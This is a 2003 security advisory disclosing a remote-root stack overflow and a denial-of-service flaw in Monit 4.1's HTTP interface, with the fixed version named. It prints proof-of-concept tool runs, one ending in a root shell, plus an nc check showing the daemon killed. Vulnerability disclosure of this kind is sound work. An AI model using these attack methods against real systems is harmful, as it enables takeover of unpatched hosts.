S-Quadra Advisory #2003-11-24 Topic: Monit 4.1 HTTP interface Multiple Security Vulnerabilities Severity: High Vendor URL: http://www.tildeslash.com/monit/ Advisory URL: http://www.s-quadra.com/advisories/Adv-20031124.txt Release date: 22 Nov 2003 1. DESCRIPTION Monit (http://www.tildeslash.com/monit/) is a utility for managing and monitoring, processes, files, directories and devices on a Unix system. It conducts automatic maintenance and repair and can execute meaningful causal actions in error situations. Monit provides a HTTP(S) interface and you can use a browser to access the monit server. There exists several security vulnerabilites in Monit HTTP interface, which could allow an attacker in the worst case to gain root access to the system. 2. DETAILS -- Vulnerability 1: Long http method stack overflow By supplying an overly large http request method and attacker could trigger a stack overflow condition which may lead to a remote root compromise. Below is a successfull run of 'xonya' Monit <= 4.1 remote root exploit (PoC): $./xonya -t 3 -p 2812 192.168.3.12 Selected platform 3 ... Retaddr is 0xXXXXXXXX, nulladdr is 0xXXXXXXXX ... Connected to 192.168.3.12:2812 Sending the request ... Got a remote shell: Linux 2.4.20 i686 unknown uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) exit -- Vulnerability 2: Denial of Service via negative Content-Length field By supplying a negative value in Content-Length header an attacker could cause a xmalloc() failure and kill a Monit daemon. Below is a successfull run of 'donit' Monit <= 4.1 remote Denial of Service exploit (PoC): $./donit -p 2812 192.168.3.12 Connecting to 192.168.3.12:2812 ... Sending the request ... Done. $ nc -v 192.168.3.12 2812 lina.s-quadra.com [192.168.3.12] 2812 (?) : Connection refused 3. FIX INFORMATION S-Quadra alerted Monit development team to this issue on 21th November 2003. New version of Monit 4.1.1 is available at http://www.tildeslash.com/monit/dist/monit-4.1.1.tar.gz which fixes the reported security vulnerabilities. 4. CREDITS Evgeny Legerov is responsible for discovering this issue. 5. ABOUT S-Quadra offers services in computer security, penetration testing and network assesment, web application security, source code review and third party product vulnerability assesment, forensic support and reverse engineering. Security is an art and our goal is to bring responsible and high quality security service to the IT market, customized to meet the unique needs of each individual client. S-Quadra, (pronounced es quadra), is not an acronym. It's unique, creative and innovative - just like the security services we bring to our clients. S-Quadra Advisory #2003-11-24